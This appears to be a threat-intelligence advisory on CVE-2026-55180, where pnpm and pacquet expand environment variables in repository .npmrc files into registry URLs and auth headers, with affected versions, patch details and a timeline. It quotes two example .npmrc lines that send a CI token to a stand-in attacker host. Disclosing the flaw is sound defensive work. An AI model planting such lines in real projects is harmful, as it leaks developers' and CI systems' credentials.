Junglewise Threat Intelligence

CVE-2026-55180: pnpm and pacquet information exposure via environment variable expansion in .npmrc

CVE-2026-55180 · Severity: medium · CVSS 6.5 · Published 2026-06-25

Vendors: Pnpm.

Executive brief

pnpm is a fast package manager used by developers and CI/CD systems to install project dependencies. The vulnerability allowed environment variable placeholders in project configuration files to be expanded into package registry URLs and authentication headers, potentially leaking sensitive CI tokens or API credentials to attacker-controlled servers before any security scripts could run. A malicious repository could exploit this by including crafted configuration files that expand environment variables into registry addresses controlled by the attacker.

Technical details

The vulnerability exists in pnpm's configuration parsing logic (config/reader/src/loadNpmrcFiles.ts, config/reader/src/getOptionsFromRootManifest.ts) and pacquet's equivalent Rust implementation. The vulnerable code substitutes ${ENV_VAR} placeholders in project .npmrc and pnpm-workspace.yaml registry URLs and authentication values before constructing dependency resolution requests. An attacker can craft a malicious repository with .npmrc entries like `registry=https://attacker.example/${CI_JOB_TOKEN}/` or `//attacker.example/:_authToken=${CI_JOB_TOKEN}`. When a developer or CI process clones the repository and runs pnpm/pacquet with sensitive environment variables set, these secrets are expanded into the registry destination and auth headers, causing requests to leak the credentials to the attacker's endpoint. The exploit requires user interaction (checking out and running pnpm commands) but no authentication. Patches (pnpm ≥10.34.2, ≥11.5.3; pacquet equivalent) disable environment variable expansion in repository-controlled registry configuration, only preserving expansion in trusted user-level .npmrc files.

Affected products

  • pnpm pnpm <10.34.2, >=11.0.0 <11.5.3
  • pnpm @pnpm/config.reader <10.34.2, >=11.0.0 <11.5.3
  • pacquet pacquet unspecified

Timeline

  • 2026-06-10: disclosed
  • 2026-06-10: patched: Patch commit a93449314f398cf4bdf2e28d033c02d37395ad22 available on shared branch; pnpm >=10.34.2 and >=11.5.3 patched

References

Related threats